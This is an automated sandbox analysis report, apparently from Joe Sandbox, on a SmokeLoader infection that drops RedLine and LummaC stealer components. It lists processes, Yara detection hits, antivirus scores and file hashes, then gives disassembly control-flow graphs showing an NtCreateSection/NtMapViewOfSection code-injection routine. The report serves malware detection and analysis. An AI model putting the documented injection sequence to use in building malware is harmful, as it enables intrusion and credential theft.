                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.885330632.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.900699694.00000000023B7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:09:53:59
                                                                    Start date:03/10/2023
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff6a6f20000
                                                                    File size:3'933'184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:15
                                                                    Start time:09:54:19
                                                                    Start date:03/10/2023
                                                                    Path:C:\Users\user\AppData\Roaming\aueuggs
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\aueuggs
                                                                    Imagebase:0x400000
                                                                    File size:302'592 bytes
                                                                    MD5 hash:EC1D1CD9D43698631CEB1157E680A00A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.950991871.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000003.939764066.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.951037651.00000000025C6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.951003696.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.951003696.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 34%, ReversingLabs
                                                                    • Detection: 46%, Virustotal, Browse
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:09:55:09
                                                                    Start date:03/10/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\6E11.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\6E11.exe
                                                                    Imagebase:0x7ff7e86d0000
                                                                    File size:3'413'536 bytes
                                                                    MD5 hash:4527E3FE757DD266980F572C43F22EF3
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.1048474823.000000000407D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\6E11.exe, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:22
                                                                    Start time:09:55:10
                                                                    Start date:03/10/2023
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    Imagebase:0xf00000
                                                                    File size:64'704 bytes
                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:09:55:15
                                                                    Start date:03/10/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\EDBC.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\EDBC.exe
                                                                    Imagebase:0x1080000
                                                                    File size:624'640 bytes
                                                                    MD5 hash:59E6F40D24C3EA84FA3BCF55B8F72C9D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:24
                                                                    Start time:09:55:16
                                                                    Start date:03/10/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7e86d0000
                                                                    File size:625'664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:25
                                                                    Start time:09:55:17
                                                                    Start date:03/10/2023
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    Imagebase:0xda0000
                                                                    File size:102'568 bytes
                                                                    MD5 hash:4DF5F963C7E18F062E49870D0AFF8F6F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:09:55:17
                                                                    Start date:03/10/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 136
                                                                    Imagebase:0xf70000
                                                                    File size:434'592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:4.2%
                                                                      Dynamic/Decrypted Code Coverage:71.3%
                                                                      Signature Coverage:51.1%
                                                                      Total number of Nodes:94
                                                                      Total number of Limit Nodes:6
                                                                      execution_graph 7309 402e41 7311 402e3a 7309->7311 7310 402ece 7311->7310 7313 4018c9 7311->7313 7314 4018d8 7313->7314 7315 401911 Sleep 7314->7315 7320 4013fb 7315->7320 7317 40192c 7319 40193d 7317->7319 7332 4014f4 7317->7332 7319->7310 7322 401404 7320->7322 7321 4013f2 7321->7317 7322->7321 7323 4015a9 NtDuplicateObject 7322->7323 7323->7321 7324 4015c6 NtCreateSection 7323->7324 7325 401646 NtCreateSection 7324->7325 7326 4015ec NtMapViewOfSection 7324->7326 7325->7321 7327 401672 7325->7327 7326->7325 7328 40160f NtMapViewOfSection 7326->7328 7327->7321 7329 40167c NtMapViewOfSection 7327->7329 7328->7325 7330 40162d 7328->7330 7329->7321 7331 4016a3 NtMapViewOfSection 7329->7331 7330->7325 7331->7321 7333 401503 7332->7333 7334 4015a9 NtDuplicateObject 7333->7334 7342 4016c5 7333->7342 7335 4015c6 NtCreateSection 7334->7335 7334->7342 7336 401646 NtCreateSection 7335->7336 7337 4015ec NtMapViewOfSection 7335->7337 7338 401672 7336->7338 7336->7342 7337->7336 7339 40160f NtMapViewOfSection 7337->7339 7340 40167c NtMapViewOfSection 7338->7340 7338->7342 7339->7336 7341 40162d 7339->7341 7340->7342 7343 4016a3 NtMapViewOfSection 7340->7343 7341->7336 7342->7319 7343->7342 7502 401501 7503 40152d 7502->7503 7504 4015a9 NtDuplicateObject 7503->7504 7512 4016c5 7503->7512 7505 4015c6 NtCreateSection 7504->7505 7504->7512 7506 401646 NtCreateSection 7505->7506 7507 4015ec NtMapViewOfSection 7505->7507 7508 401672 7506->7508 7506->7512 7507->7506 7509 40160f NtMapViewOfSection 7507->7509 7510 40167c NtMapViewOfSection 7508->7510 7508->7512 7509->7506 7511 40162d 7509->7511 7510->7512 7513 4016a3 NtMapViewOfSection 7510->7513 7511->7506 7513->7512 7383 402e07 7384 402e17 7383->7384 7385 402ece 7384->7385 7386 4018c9 15 API calls 7384->7386 7386->7385 7466 4012aa 7467 4012b9 7466->7467 7468 4015a9 NtDuplicateObject 7467->7468 7476 4013f2 7467->7476 7469 4015c6 NtCreateSection 7468->7469 7468->7476 7470 401646 NtCreateSection 7469->7470 7471 4015ec NtMapViewOfSection 7469->7471 7472 401672 7470->7472 7470->7476 7471->7470 7473 40160f NtMapViewOfSection 7471->7473 7474 40167c NtMapViewOfSection 7472->7474 7472->7476 7473->7470 7475 40162d 7473->7475 7474->7476 7477 4016a3 NtMapViewOfSection 7474->7477 7475->7470 7477->7476 7538 4091ec 7539 40ae93 __calloc_crt RtlAllocateHeap 7538->7539 7540 4091f8 7539->7540 7344 424310 7345 424327 7344->7345 7348 423c30 7345->7348 7347 4245d8 7350 423c56 __write_nolock 7348->7350 7349 423dfb LocalAlloc 7355 423e19 7349->7355 7350->7349 7351 424173 VirtualProtect 7352 42419a 7351->7352 7353 4241d2 LoadLibraryW 7352->7353 7354 42425c 7353->7354 7354->7347 7355->7351 7407 4018d4 7408 4018ea 7407->7408 7409 401911 Sleep 7408->7409 7410 4013fb 7 API calls 7409->7410 7411 40192c 7410->7411 7412 4014f4 7 API calls 7411->7412 7413 40193d 7411->7413 7412->7413 7356 40a6f8 7357 40a710 _wcslen 7356->7357 7361 40a708 7356->7361 7362 40ae93 7357->7362 7359 40ae93 __calloc_crt RtlAllocateHeap 7360 40a734 _wcslen __wsetenvp 7359->7360 7360->7359 7360->7361 7364 40ae9c 7362->7364 7365 40aed9 7364->7365 7366 40dae2 7364->7366 7365->7360 7367 40daee __calloc_crt 7366->7367 7368 40dafa 7367->7368 7369 40db1c RtlAllocateHeap 7367->7369 7368->7364 7369->7367 7369->7368 7370 40a3f8 HeapCreate

                                                                      Executed Functions

                                                                      Function 004012AB Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 392COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4012ab-4012b2 1 4012c3 0->1 2 4012b9-4012da 0->2 1->2 7 4012ee 2->7 8 4012df-4012ea 2->8 7->8 9 4012f1-40138a call 401186 7->9 8->9 16 401408 9->16 17 40138c 9->17 18 40140b-401411 16->18 19 401404 17->19 20 40138e-40139c 17->20 24 401418-40143c 18->24 19->16 23 401415 19->23 21 4013fa-401403 20->21 22 40139e-40143e 20->22 21->19 27 40143f-40145b call 401186 22->27 23->18 23->24 24->27 33 4013f2-4013f8 27->33 34 40145d-401481 27->34 36 4014a0-4014a3 34->36 37 401483-401487 34->37 39 401502-401553 call 401186 36->39 40 4014a5-4014b4 36->40 37->36 38 401489-40148e 37->38 38->36 41 401491-40149f 38->41 57 401555 39->57 58 401558-40155d 39->58 45 4014b6-4014b8 40->45 41->36 45->45 47 4014ba-4014ce 45->47 49 4014d0-4014d2 47->49 50 4014ea-4014f1 47->50 57->58 60 401563-401574 58->60 61 401878-401880 58->61 64 401876-401897 60->64 65 40157a-4015a3 60->65 61->58 72 4018a6 64->72 73 40189d-4018c6 call 401186 64->73 65->64 74 4015a9-4015c0 NtDuplicateObject 65->74 72->73 74->64 75 4015c6-4015ea NtCreateSection 74->75 77 401646-40166c NtCreateSection 75->77 78 4015ec-40160d NtMapViewOfSection 75->78 77->64 80 401672-401676 77->80 78->77 81 40160f-40162b NtMapViewOfSection 78->81 80->64 83 40167c-40169d NtMapViewOfSection 80->83 81->77 84 40162d-401643 81->84 83->64 87 4016a3-4016bf NtMapViewOfSection 83->87 84->77 87->64 89 4016c5 call 4016ca 87->89
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O$u
                                                                      • API String ID: 0-1426094074
                                                                      • Opcode ID: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                      • Instruction ID: 6c0fdc4d84967332c471f3e59838abf2ed393e8be5ddaf11b6e9a247f6d6b291
                                                                      • Opcode Fuzzy Hash: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                      • Instruction Fuzzy Hash: F5D12571904245EBDB219F55CC44EAB7BB8FF82714F24417BE952BA1F1D2388602CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004014F4 Relevance: 10.7, APIs: 7, Instructions: 181nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 92 4014f4-401553 call 401186 104 401555 92->104 105 401558-40155d 92->105 104->105 107 401563-401574 105->107 108 401878-401880 105->108 111 401876-401897 107->111 112 40157a-4015a3 107->112 108->105 119 4018a6 111->119 120 40189d-4018c6 call 401186 111->120 112->111 121 4015a9-4015c0 NtDuplicateObject 112->121 119->120 121->111 122 4015c6-4015ea NtCreateSection 121->122 124 401646-40166c NtCreateSection 122->124 125 4015ec-40160d NtMapViewOfSection 122->125 124->111 127 401672-401676 124->127 125->124 128 40160f-40162b NtMapViewOfSection 125->128 127->111 130 40167c-40169d NtMapViewOfSection 127->130 128->124 131 40162d-401643 128->131 130->111 134 4016a3-4016bf NtMapViewOfSection 130->134 131->124 134->111 136 4016c5 call 4016ca 134->136
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                      • Instruction ID: 17c8b5c6b7d03a249af4a1ce3f33b6d11283f5bd133b62a523f5e2d8a45d1619
                                                                      • Opcode Fuzzy Hash: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                      • Instruction Fuzzy Hash: 0D512D71900205BFEB209F91CC48FEF7BB8EF85B00F104129F912BA2E5E6749941CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401501 Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 139 401501-401553 call 401186 146 401555 139->146 147 401558-40155d 139->147 146->147 149 401563-401574 147->149 150 401878-401880 147->150 153 401876-401897 149->153 154 40157a-4015a3 149->154 150->147 161 4018a6 153->161 162 40189d-4018c6 call 401186 153->162 154->153 163 4015a9-4015c0 NtDuplicateObject 154->163 161->162 163->153 164 4015c6-4015ea NtCreateSection 163->164 166 401646-40166c NtCreateSection 164->166 167 4015ec-40160d NtMapViewOfSection 164->167 166->153 169 401672-401676 166->169 167->166 170 40160f-40162b NtMapViewOfSection 167->170 169->153 172 40167c-40169d NtMapViewOfSection 169->172 170->166 173 40162d-401643 170->173 172->153 176 4016a3-4016bf NtMapViewOfSection 172->176 173->166 176->153 178 4016c5 call 4016ca 176->178
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                      • Instruction ID: 6f0604b32057d325caf3f51fa446859acea35a512505d6c4cf197e41671a197c
                                                                      • Opcode Fuzzy Hash: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                      • Instruction Fuzzy Hash: 8C512BB1900249BFEF209F92CC48FEFBBB8EF85700F144159F911AA2E5E6759941CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401528 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 181 401528-401553 call 401186 185 401555 181->185 186 401558-40155d 181->186 185->186 188 401563-401574 186->188 189 401878-401880 186->189 192 401876-401897 188->192 193 40157a-4015a3 188->193 189->186 200 4018a6 192->200 201 40189d-4018c6 call 401186 192->201 193->192 202 4015a9-4015c0 NtDuplicateObject 193->202 200->201 202->192 203 4015c6-4015ea NtCreateSection 202->203 205 401646-40166c NtCreateSection 203->205 206 4015ec-40160d NtMapViewOfSection 203->206 205->192 208 401672-401676 205->208 206->205 209 40160f-40162b NtMapViewOfSection 206->209 208->192 211 40167c-40169d NtMapViewOfSection 208->211 209->205 212 40162d-401643 209->212 211->192 215 4016a3-4016bf NtMapViewOfSection 211->215 212->205 215->192 217 4016c5 call 4016ca 215->217
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                      • Instruction ID: af98140ee9de545a9c2869d3359d5e8b3b7d0483e67685bb764150cfa9c8d530
                                                                      • Opcode Fuzzy Hash: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                      • Instruction Fuzzy Hash: 6E510871900259BFEB209F92CC48FEFBBB8EF85B10F144159F911AA2A5E7719940CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040153C Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 220 40153c-401553 call 401186 226 401555 220->226 227 401558-40155d 220->227 226->227 229 401563-401574 227->229 230 401878-401880 227->230 233 401876-401897 229->233 234 40157a-4015a3 229->234 230->227 241 4018a6 233->241 242 40189d-4018c6 call 401186 233->242 234->233 243 4015a9-4015c0 NtDuplicateObject 234->243 241->242 243->233 244 4015c6-4015ea NtCreateSection 243->244 246 401646-40166c NtCreateSection 244->246 247 4015ec-40160d NtMapViewOfSection 244->247 246->233 249 401672-401676 246->249 247->246 250 40160f-40162b NtMapViewOfSection 247->250 249->233 252 40167c-40169d NtMapViewOfSection 249->252 250->246 253 40162d-401643 250->253 252->233 256 4016a3-4016bf NtMapViewOfSection 252->256 253->246 256->233 258 4016c5 call 4016ca 256->258
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900412756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                      • Instruction ID: bcfd12d57f681495948eb5138da1c6a4081ea1a5ed11d5619747b33be395d59e
                                                                      • Opcode Fuzzy Hash: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                      • Instruction Fuzzy Hash: 8C510A71900245BFEB209F92CC48FEFBBB8EF85750F104159F911BA1A5E6749941CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00423C30 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 501memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 261 423c30-423c6a call 40e960 264 423c70-423c76 261->264 265 423c78-423c7c 264->265 266 423c7e-423c84 264->266 265->266 267 423c86-423c8e 266->267 268 423c9a-423ca1 266->268 267->268 270 423c90-423c98 267->270 268->264 271 423ca3-423cad 268->271 270->268 270->271 272 423cb3-423d13 271->272 273 423da6-423dba 271->273 316 423d16-423d1b 272->316 274 423dc0-423dc6 273->274 276 423dd3-423dda 274->276 277 423dc8-423dcd 274->277 278 423df2-423df9 276->278 279 423ddc-423def 276->279 277->276 278->274 280 423dfb-423e17 LocalAlloc 278->280 279->278 282 423e90-423e93 280->282 283 423e19-423e2b 280->283 286 423f60-423f78 282->286 287 423e99-423f5b 282->287 285 423e30-423e35 283->285 289 423e37-423e4f 285->289 290 423e59-423e66 call 4239b0 285->290 291 423f80-423f83 286->291 287->286 289->290 305 423e8b-423e8e 290->305 306 423e68-423e86 290->306 293 423fb3-423fb8 291->293 294 423f85-423fae 291->294 299 42411b-42411f 293->299 300 423fbe-424116 293->300 294->293 299->291 307 424125-42413c 299->307 300->299 305->282 305->285 306->305 310 424140-424153 307->310 334 424155-42415b 310->334 316->316 320 423d1d-423d24 316->320 323 423d30-423d33 320->323 324 423d26 320->324 325 423d43-423d45 323->325 326 423d35-423d41 323->326 324->323 329 423d52-423d5c 325->329 330 423d47-423d4b 325->330 333 423d50 326->333 335 423d5e-423d66 329->335 336 423d8d-423d91 329->336 330->333 333->329 341 424160-42416a 334->341 342 423d68 335->342 343 423d6c-423d83 call 40b520 335->343 338 423d93-423d9d 336->338 339 423da0 336->339 338->339 339->273 345 424170-424171 341->345 346 42416c 341->346 342->343 354 423d85 343->354 355 423d89 343->355 345->341 350 424173-4241a2 VirtualProtect call 423be0 345->350 346->345 359 4241a7-4241ad 350->359 354->355 355->336 361 4241af-4241b8 359->361 362 4241bc-4241c2 359->362 361->362 363 4241c4 call 423990 362->363 364 4241c9-4241d0 362->364 363->364 364->359 367 4241d2-424256 LoadLibraryW 364->367 369 4242ec-424303 367->369 370 42425c-4242e4 367->370 370->369
                                                                      APIs
                                                                      • LocalAlloc.KERNELBASE(00000000,022826CC,?,?,?,?,?,?,00426666,000000FF), ref: 00423E03
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.900417378.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLocal
                                                                      • String ID: t^:
                                                                      • API String ID: 3494564517-1317908726
                                                                      • Opcode ID: c062c4851d68092e18220f5942159808537afa80d0018a64bd420801c80f2341
                                                                      • Instruction ID: 4d636d28f844f565b3d530f3d341ce37d985ee3deda23cb04abb92f0731eb413
                                                                      • Opcode Fuzzy Hash: c062c4851d68092e18220f5942159808537afa80d0018a64bd420801c80f2341
                                                                      • Instruction Fuzzy Hash: A402DB71644340ABE320EF90ED49F5B77B8EB84B01F50452EF785AB1E0DBB49944CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040DAE2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 400 40dae2-40daec 401 40db09-40db12 400->401 402 40daee-40daf8 400->402 403 40db14 401->403 404 40db15-40db1a 401->404 402->401 405 40dafa-40db08 402->405 403->404 406 40db1c-40db2d RtlAllocateHeap 404->406 407 40db2f-40db36 404->407 406->407 409 40db61-40db63 406->409 410 40db54-40db59 407->410 411 40db38-40db41 call 40910e 407->411 410->409 413 40db5b 410->413 411->404 415 40db43-40db48 411->415 413->409 416 40db50-40db52 415->416 417 40db4a 415->417 416->409 417->416
                                                                      APIs
